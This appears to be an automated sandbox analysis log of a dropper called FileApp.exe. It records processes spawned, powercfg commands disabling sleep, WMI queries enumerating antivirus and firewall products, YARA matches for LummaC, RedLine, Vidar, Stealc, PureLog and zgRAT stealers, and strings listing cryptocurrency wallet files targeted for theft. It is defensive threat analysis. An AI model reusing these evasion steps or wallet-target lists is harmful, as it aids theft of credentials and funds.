Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown
Source: C:\ProgramData\jewkkwnf\jewkkwnf.exe	Process created: unknown unknown
Source: C:\ProgramData\jewkkwnf\jewkkwnf.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Local\ExtreamFanV6\ExtreamFanV6.exe	Process created: C:\Users\user\AppData\Local\ExtreamFanV6\ExtreamFanV6.exe "C:\Users\user\AppData\Local\ExtreamFanV6\ExtreamFanV6.exe"
Source: C:\Users\user\AppData\Local\ExtreamFanV6\ExtreamFanV6.exe	Process created: C:\Users\user\AppData\Local\ExtreamFanV6\ExtreamFanV6.exe "C:\Users\user\AppData\Local\ExtreamFanV6\ExtreamFanV6.exe"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 22_2_69D04760 malloc,InitializeSecurityDescriptor,SetSecurityDescriptorOwner,SetSecurityDescriptorGroup,GetLengthSid,GetLengthSid,GetLengthSid,malloc,InitializeAcl,AddAccessAllowedAce,AddAccessAllowedAce,AddAccessAllowedAce,SetSecurityDescriptorDacl,PR_SetError,GetLastError,free,GetLastError,GetLastError,free,free,free,

22_2_69D04760

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 22_2_69BE1C30 GetCurrentProcess,OpenProcessToken,GetTokenInformation,GetLengthSid,malloc,CopySid,CopySid,GetTokenInformation,GetLengthSid,malloc,CopySid,CloseHandle,AllocateAndInitializeSid,GetLastError,PR_LogPrint,

22_2_69BE1C30

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 2_2_0053D8FE cpuid

2_2_0053D8FE

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,

22_2_00417630

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0

Source: C:\Users\user\Desktop\FileApp.exe	Queries volume information: C:\Users\user\Desktop\FileApp.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\FileApp.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\iofolko5\ZYgCMtJP3wxddinn5Sa3IKJH.exe	Queries volume information: C:\Users\user\Documents\iofolko5\ZYgCMtJP3wxddinn5Sa3IKJH.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\iofolko5\l6BAwR4854FJ5LVXvo8GWfAt.exe	Queries volume information: C:\Users\user\Documents\iofolko5\l6BAwR4854FJ5LVXvo8GWfAt.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\iofolko5\l6BAwR4854FJ5LVXvo8GWfAt.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\iofolko5\kPy9KuGWnhtidoY4IdmVbiaT.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\iofolko5\xNc0eiwaHinah8TaPUA3TuXZ.exe	Queries volume information: C:\Users\user\Documents\iofolko5\xNc0eiwaHinah8TaPUA3TuXZ.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\iofolko5\B4LiZFzJ_IAKzmYhwI_ve0Iy.exe	Queries volume information: C:\Users\user\Documents\iofolko5\B4LiZFzJ_IAKzmYhwI_ve0Iy.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\iofolko5\B4LiZFzJ_IAKzmYhwI_ve0Iy.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\iofolko5\B4LiZFzJ_IAKzmYhwI_ve0Iy.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\iofolko5\DSN_5xuwaC5nkP_MHzd7lLTl.exe	Queries volume information: C:\Users\user\Documents\iofolko5\DSN_5xuwaC5nkP_MHzd7lLTl.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\iofolko5\uht_7KlzJBHoKg010MzYxndX.exe	Queries volume information: C:\Windows VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\iofolko5\uht_7KlzJBHoKg010MzYxndX.exe	Queries volume information: C:\Windows\AppReadiness VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\iofolko5\uht_7KlzJBHoKg010MzYxndX.exe	Queries volume information: C:\Windows\BitLockerDiscoveryVolumeContents VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\iofolko5\uht_7KlzJBHoKg010MzYxndX.exe	Queries volume information: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\iofolko5\uht_7KlzJBHoKg010MzYxndX.exe	Queries volume information: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\iofolko5\m9GWTeQylsPUCcnTEkTCS8lf.exe	Queries volume information: C:\Users\user\Documents\iofolko5\m9GWTeQylsPUCcnTEkTCS8lf.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\iofolko5\m9GWTeQylsPUCcnTEkTCS8lf.exe	Queries volume information: C:\Windows VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\iofolko5\m9GWTeQylsPUCcnTEkTCS8lf.exe	Queries volume information: C:\Windows\AppReadiness VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\iofolko5\m9GWTeQylsPUCcnTEkTCS8lf.exe	Queries volume information: C:\Windows\BitLockerDiscoveryVolumeContents VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\iofolko5\m9GWTeQylsPUCcnTEkTCS8lf.exe	Queries volume information: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\iofolko5\m9GWTeQylsPUCcnTEkTCS8lf.exe	Queries volume information: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Documents\iofolko5\pO77aCusXJv6mYqR0srms9ou.exe	Queries volume information: C:\Users\user\Documents\iofolko5\pO77aCusXJv6mYqR0srms9ou.exe VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IdentityModel\v4.0_4.0.0.0__b77a5c561934e089\System.IdentityModel.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\Documents\iofolko5\B4LiZFzJ_IAKzmYhwI_ve0Iy.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Queries volume information: C:\ VolumeInformation
Source: C:\ProgramData\jewkkwnf\jewkkwnf.exe	Queries volume information: C:\ProgramData\jewkkwnf\jewkkwnf.exe VolumeInformation
Source: C:\ProgramData\jewkkwnf\jewkkwnf.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\ProgramData\jewkkwnf\jewkkwnf.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\ProgramData\jewkkwnf\jewkkwnf.exe	Queries volume information: C:\ProgramData\jewkkwnf\jewkkwnf.exe VolumeInformation
Source: C:\ProgramData\jewkkwnf\jewkkwnf.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\ProgramData\jewkkwnf\jewkkwnf.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Local\ExtreamFanV6\ExtreamFanV6.exe	Queries volume information: C:\Users\user\AppData\Local\ExtreamFanV6\ExtreamFanV6.exe VolumeInformation
Source: C:\Users\user\AppData\Local\ExtreamFanV6\ExtreamFanV6.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\AppData\Local\ExtreamFanV6\ExtreamFanV6.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 22_2_00417420 GetProcessHeap,HeapAlloc,GetLocalTime,wsprintfA,

22_2_00417420

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 22_2_004172F0 GetProcessHeap,HeapAlloc,GetUserNameA,

22_2_004172F0

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 22_2_004174D0 GetProcessHeap,HeapAlloc,GetTimeZoneInformation,wsprintfA,

22_2_004174D0

Source: C:\Users\user\Documents\iofolko5\g5YPTfbb3UXQYqfB9k0rJePl.exe

Code function: 14_2_0040681B GetVersion,GetSystemDirectoryW,GetWindowsDirectoryW,SHGetSpecialFolderLocation,SHGetPathFromIDListW,CoTaskMemFree,lstrcatW,lstrlenW,

14_2_0040681B

Source: C:\Users\user\Desktop\FileApp.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Lowering of HIPS / PFW / Operating System Security Settings

Modifies power options to not sleep / hibernate

Source: C:\Users\user\Documents\iofolko5\5Qs0KV98dc5QrQIgi5l7CPu5.exe	Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
Source: C:\Users\user\Documents\iofolko5\5Qs0KV98dc5QrQIgi5l7CPu5.exe	Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
Source: C:\Users\user\Documents\iofolko5\5Qs0KV98dc5QrQIgi5l7CPu5.exe	Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0	Jump to behavior
Source: C:\Users\user\Documents\iofolko5\5Qs0KV98dc5QrQIgi5l7CPu5.exe	Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0	Jump to behavior

Source: ZYgCMtJP3wxddinn5Sa3IKJH.exe, 00000005.00000002.2417773701.0000000001211000.00000004.00000020.00020000.00000000.sdmp, xNc0eiwaHinah8TaPUA3TuXZ.exe, 00000008.00000002.2414470281.0000000000591000.00000004.00000020.00020000.00000000.sdmp, DSN_5xuwaC5nkP_MHzd7lLTl.exe, 0000000A.00000002.2427779581.0000000001542000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: avp.exe
Source: ZYgCMtJP3wxddinn5Sa3IKJH.exe, 00000005.00000002.2417773701.0000000001211000.00000004.00000020.00020000.00000000.sdmp, xNc0eiwaHinah8TaPUA3TuXZ.exe, 00000008.00000002.2414470281.0000000000591000.00000004.00000020.00020000.00000000.sdmp, DSN_5xuwaC5nkP_MHzd7lLTl.exe, 0000000A.00000002.2427779581.0000000001542000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: AVP.exe
Source: RegAsm.exe, 00000002.00000002.2422723030.0000000000E58000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : Select * From AntiVirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntivirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntiSpyWareProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM FirewallProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntivirusProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiSpyWareProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM FirewallProduct
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * From AntiVirusProduct

Stealing of Sensitive Information

Yara detected LummaC Stealer

Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR
Source: Yara match	File source: 12.2.m9GWTeQylsPUCcnTEkTCS8lf.exe.24ec000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 37.2.BitLockerToGo.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.uht_7KlzJBHoKg010MzYxndX.exe.1a50000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.uht_7KlzJBHoKg010MzYxndX.exe.1b50000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 36.2.BitLockerToGo.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.m9GWTeQylsPUCcnTEkTCS8lf.exe.24ec000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 37.2.BitLockerToGo.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 36.2.BitLockerToGo.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.uht_7KlzJBHoKg010MzYxndX.exe.1b50000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.m9GWTeQylsPUCcnTEkTCS8lf.exe.2380000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.m9GWTeQylsPUCcnTEkTCS8lf.exe.2380000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.uht_7KlzJBHoKg010MzYxndX.exe.1a50000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000025.00000002.2651621798.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.2767261547.0000000002380000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.2703817640.0000000002060000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2733299099.0000000001B50000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.2767261547.00000000024EC000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2733299099.0000000001A50000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000024.00000002.2610045392.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.2656601610.00000000018EC000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

Yara detected PureLog Stealer

Source: Yara match	File source: 23.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.ZYgCMtJP3wxddinn5Sa3IKJH.exe.40e5570.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.ZYgCMtJP3wxddinn5Sa3IKJH.exe.40e5570.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000017.00000002.2458059761.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2594491331.00000000040E5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Yara detected RedLine Stealer

Source: Yara match	File source: dump.pcap, type: PCAP
Source: Yara match	File source: 8.2.xNc0eiwaHinah8TaPUA3TuXZ.exe.33c5570.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.xNc0eiwaHinah8TaPUA3TuXZ.exe.33c5570.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 21.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000008.00000002.2611175093.00000000033C5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000002.2847715040.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: xNc0eiwaHinah8TaPUA3TuXZ.exe PID: 4072, type: MEMORYSTR

Yara detected Stealc

Source: Yara match	File source: 00000007.00000002.3125271481.000000000148E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000016.00000002.3044658256.000000000108A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: kPy9KuGWnhtidoY4IdmVbiaT.exe PID: 3048, type: MEMORYSTR
Source: Yara match	File source: dump.pcap, type: PCAP

Yara detected Vidar

Source: Yara match

File source: dump.pcap, type: PCAP

Yara detected Vidar stealer

Source: Yara match	File source: 25.2.RegAsm.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 25.2.RegAsm.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.DSN_5xuwaC5nkP_MHzd7lLTl.exe.4295570.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.DSN_5xuwaC5nkP_MHzd7lLTl.exe.4295570.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000A.00000002.2613302475.0000000004295000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000019.00000002.3234197718.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: DSN_5xuwaC5nkP_MHzd7lLTl.exe PID: 7060, type: MEMORYSTR

Yara detected zgRAT

Source: Yara match	File source: 23.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.ZYgCMtJP3wxddinn5Sa3IKJH.exe.40e5570.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.ZYgCMtJP3wxddinn5Sa3IKJH.exe.40e5570.0.raw.unpack, type: UNPACKEDPE

Found many strings related to Crypto-Wallets (likely being stolen)

Source: RegAsm.exe	String found in binary or memory: lockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.*\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exo
Source: RegAsm.exe	String found in binary or memory: us\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|M
Source: RegAsm.exe	String found in binary or memory: lockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.*\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exo
Source: FileApp.exe, 00000000.00000002.2130547013.0000000005D20000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: CVRMAVOZKNKKEPGOIFIDCMVPPNFPDVCIGEJAXXDEIJCFMHXO
Source: RegAsm.exe	String found in binary or memory: us\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|M
Source: RegAsm.exe	String found in binary or memory: lockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.*\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exo
